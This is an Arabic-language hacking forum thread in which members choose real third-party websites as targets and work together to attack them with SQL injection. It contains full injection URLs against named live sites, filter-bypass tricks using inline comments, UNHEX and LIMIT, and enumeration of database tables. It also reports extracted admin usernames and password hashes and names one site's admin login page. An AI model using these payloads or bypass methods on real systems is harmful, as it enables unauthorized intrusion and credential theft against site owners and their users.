السلام عليكم هلا اخي فولكانو منور الغرفة اليوم جبتلكم موقع لازمله شوي شطارة http://www.dawnnet.org/resources-news.php?id=170 بالتوفيق شباب |
جاري المحاولة مع العلم أنني عندي فترة لم أخترق بالسيكول و الظاهر أني نسيت كثير أشياء ههههههههههه لكن بإذن الله عودة قوية :) |
أخي عبد الصمد أنا جربت بال all و التخطي ب /**/union/**/ و لم تنفع معي هل إستخدمت طريقة جديدة في تخطي الفوربدن 403 |
[QUOTE=_darkman_;265643]أخي عبد الصمد أنا جربت بال all و التخطي ب /**/union/**/ و لم تنفع معي هل إستخدمت طريقة جديدة في تخطي الفوربدن 403[/ السلام عليكم وليد بلادي تعرف هذا الموقع فيه خاصية عجباني تستخدم تقريبا كل طرق وايضا هذا الموقع مانع عدة اوامر وانا تخطيت الفوريدن مش ب union ب select وايضا لما راح تتخطى هالشيء راح يكون فيه مشكل اخر وايضا فيه مشكل اخر الحقنة بس لو تركز شوي راح تتخطاهم اذا لم يحقنه اي واحد راح ارفع الشرح فيديو |
اقتباس:
استطعت حقن الموقع لكني لم اوفق في استخراج اسم الادمن والباسوورد :a43: |
اقتباس:
|
اقتباس:
المشكله انو الجداول والاعمدة اللي اخمنها وتطلع صح تكون فاضية مافيها بيانات :( |
اقتباس:
لاتخمن هالموقع الاصدار الخامس ركز فقط اخي بعرف انك راح تجيبه كل التحية لك اخي على المجهود |
[QUOTE=عبد الصمد;265706] اقتباس:
أنا لما أصادف موقع يحتاج لفلترة أمر عليه مرور الكرام ولا أحاول معه لأني أكرهها |
اوكي اخي راح احط الحقنة كود:
كود: /*!select*/ concat التخطي ب كود: /*!concat*/ group_ الاستعلام ب limit مشكل اخر الحقنة والتخطي ب UNHEX اليوزر admin الباس 21232f297a57a5a743894a0e4a801fc3 اتمنى انو تكون وصلة الفكرة ومشكور مشرفنا الغالي على المجهود اخوك عبد الصمد |
اخوي لما انفذ حقنك هذا اللي يظهر لي Anonymous: نفس اللي كان يطلع معي مع العلم انو حقني كان بدون UNHEX(HEX( |
زبط معي بعد اضافة limit 1,1 بالاخير وانا كنت اكتب limit 0,10 ويطلع لي سجل واحد بس الاول يعني شكل الحقن بيكون كود: http://www.dawnnet.org/resources-news.php?id=-170 UNION /*!SELECT*/ 1,2,3,/*!concat*/(username,0x3a,user_password),5,6,7,8,9,10,11,12 from phpbb_users limit 1,1 -- |
السلام عليكم هل من هدف جديد ?? |
اقتباس:
انا قلتلك لازم تركز ضع حقنتي ونزل لتحت الصفحة راح تلاقي اليوزر والباس اخي لازم تركز جيدا وانا كنت عارف انك راح تجيبه بس انت ماكنت مركز هالموفع مانع كلمة group_ بس يطلع كل الجداول واليوزرات والباسوردات مرة وحدة ولما تستعمل الامر limit هالامر منشان طلع جداول اخرى اذا اطلعتش المرة الاولى فهمت علي اخي |
[align=center]بارك الله فيكم غرفة رائعة سوف أكون معكم إن شاءا لله هل من هدف جديد؟؟؟؟؟[/align] |
اقتباس:
أنا أعرف طرقة التخطي /*!SELECT*/ لكن أنا أعرفها بالنسبة لل forbidden 406 لم أكن أعلم أن هاته الطريقة تنفع في forbidden 404 هههههههههههه شكرا على هاته المعلومة الجديدة smilies15 smilies14 :a07: |
اقتباس:
وايضا هاذي الغرفة لتبادل الخبرات وتطوير الذات ربنا يسعدك اخي كل الاحترام والتقدير لك |
السلام عليكم الهدف موقع للمغني شيكو لولو ههههههههههه http://www.northernharbour.com/gallery.php?id=5 بالتوفيق شباب |
اقتباس:
|
الحقنة وصلت إلى كود: http://www.northernharbour.com/gallery.php?id=-5%20/*!union*/%20%20select%201,2,3,/*!concat*/%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns-- لأني جربت ال unhex(hex()) وجربت /*!*/ و مانفعو :) |
اقتباس:
media_pictures:other:mexpress_2894229478 حقنتك صحيحة كمل انت حبيت تستعرض الجداول ضيف الامر limit شوف معي كود: http://www.northernharbour.com/gallery.php?id=-5 union /*!select*/ 1,2,3,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+limit+1,1-- فهمت علي اخي بس انت كمل حقنتك عادي بدون اضافة الامر limit لغاية لما تجي طلع اليوزرات اوكي يعني كود: /*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, |
اقتباس:
اليوزر : group_id |
السلام عليكم بفففففففف دائما القاكم بداتو علي الحقن بففف دائما اتي متاخرررررر المهم لقد حقنت الموقع عدد الاعمدة 5 http://www.northernharbour.com/gallery.php?id=5 UNION /*!select*/ 1,2,3,4,5-- تابل نايم يوزر calendar_users http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,table_name,5+from+information_schema.columns +where+column_name+like+CHAR(37, 112, 97, 115, 37)-- تابل يوزر http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,column_name,5+from+information_schema.column s+where+table_name=0x63616c656e6461725f7573657273+ limit+1,1-- تابل باس http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,column_name,5+from+information_schema.column s+where+table_name=0x63616c656e6461725f7573657273+ limit+2,1-- يوزر mexpress http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,username,5+from+calendar_users-- الباس wef.xIRu/YVfo http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,password,5+from+calendar_users-- و في الاخير اتمنى ان اكون انا اول من جلب الحقنة الكاملة للموقع :c |
طبعا اصدار القاعدة البينات هو 5 و بالنسبة لصفحة الادمين فلم اجدها |
اقتباس:
أنا أعرف الحقن جيدا و أعرف إستخدام الأمر limit لكن في متصفحي لا يعرض شيئا لغاية الآن لا أعلم السبب لماذا لكن مشكور على التوضيح يا وليد بلادي 1,2,3 viva l'algerie :) واصل + أحاى تقييم ...لأحلى عضو :a09: |
أنظر يا أخي عبد الصمد كود: http://www.northernharbour.com/gallery.php?id=-5 /*!union*/ select 1,2,3,/*!concat*/(group_id,0x3a,username,0x3a,password),5+from+calendar_users-- كود: calendar_users:password:mexpress_2894229478 كود: calendar_users:username:mexpress_2894229478 كود: calendar_users:password:mexpress_2894229478 كود: calendar_users:group_id:mexpress_2894229478 كود: where+column_name+LIKE (%pass)% أرجو أن أكون قد وضحت الفكرة :) وشكرا مرة أخرى و الختام مسك وسلام :a26: |
لا نستطيع التخطي هنا ومعرفة جميع جداول الموقع أرجو أن أكون قد وضحت الفكرة :) وشكرا مرة أخرى و الختام مسك وسلام :a26:[/QUOTE] نعم أخي صدقت فصاحب الموقع عامل حماية على أمر group ولكن اليوزر الذي ظهر معك عير يلي ظهر معي ....مع أنه نفس الباسوورد... |
اقتباس:
نعم أخي صدقت فصاحب الموقع عامل حماية على أمر group ولكن اليوزر الذي ظهر معك عير يلي ظهر معي ....مع أنه نفس الباسوورد...[/QUOTE] هههههههههههههههههههههههه عصفورين بحجر واحد :cry[1]: |
منتظرين أهداف جديدة |
كود: http://www.faddoul-trade.com/product-det.php?l=2&id=11 جاري المحاولة معه و أنتم أيضا :) |
السلام عليكم هاانا رجعت معذرة شباب انا كنت في العمل مشرفنا انت مافهمتني شو كنت عم اقصد وانا مافهمتك شو كنت تقصد بس بعد التوضيح فهمتك كل التحية لك اخي الحبيب الحقنة بس اقولكم شيء هالموقع كارثة ثقيل جدا الصفحة تقد ساعة عشان تظهر ههههههههههه النت عندي 236 كيلو بايت ههههههههههههههه كود: http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(user_name,0x3a,id,0x3a,pass_word),3,4,5+from+members وايضا لما نحاول نتخطى بالامر كود: /*!concat*/ التخطي ب كود: /*!CONCAT واخر الحقنة استعملو الامر LIMIT للبحث عن شيح القبيلة الادمن هههههههههههه انا ماقدرت ابحث لانو النت بيفصل كثير وهالموقع ثقيل جدا |
اقتباس:
لا بأس أخي صمودة هههههههههههههههههههههههه التحية و التقدير والإحترام متبادلين أعذروني لقد عدت الآن فقط :) جاري حقن الموقع بإذن الله :) |
اقتباس:
جاري البحث عن فئران تجارب جديدة هههههههههه كل الاحترام والتقدير لك اخي |
أخي صمودة بالنسبة للأنترنت أنا أيضا 256 ميقا بايت نتاع الزواولة ههههههههههههههههههههههههههه |
كود: http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema)*/,3,4,5+from+informaion_schema.columns-- و الموقع ثقيل جدا و النت تنقطع جاري الإكمال بعد العودة :) |
السلام عليكم شباب كيف احولكم ? هل حقنتي السابقة صحيحة ? و هل من هدف جديد ? |
اقتباس:
يايما شحال ثقيلة ههههههههههههههه نوكل عليهم ربي هههههههههههه هدف جديد سهل الحقن وهذا اول موقع حقنته في بداتيتي في السكيول ذكريات يعني هههههههههههa012 http://www.michaelkenna.net/publicat...tail.php?id=79 |
اقتباس:
أي حقنة ؟ |
تم الحقن http://www.michaelkenna.net/publicat...ail.php?id=-79 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(user,0x3a,password) ,11,12+from+tblUsers-- صفحة الادمين https://www.michaelkenna.net/admin/login.php الهاشات لم افكها |
اقتباس:
ممكن تعيرني شوية نت لانو النت تبعي بيموت هههههههههه:a09: بطل اخي واصل الهاش انا حاولت معه كثير بس ماقدرت افكو يمكن فيه احد الاخوان يقدر يفكو |
الساعة الآن 02:23 PM |
[ vBspiders.Com Network ]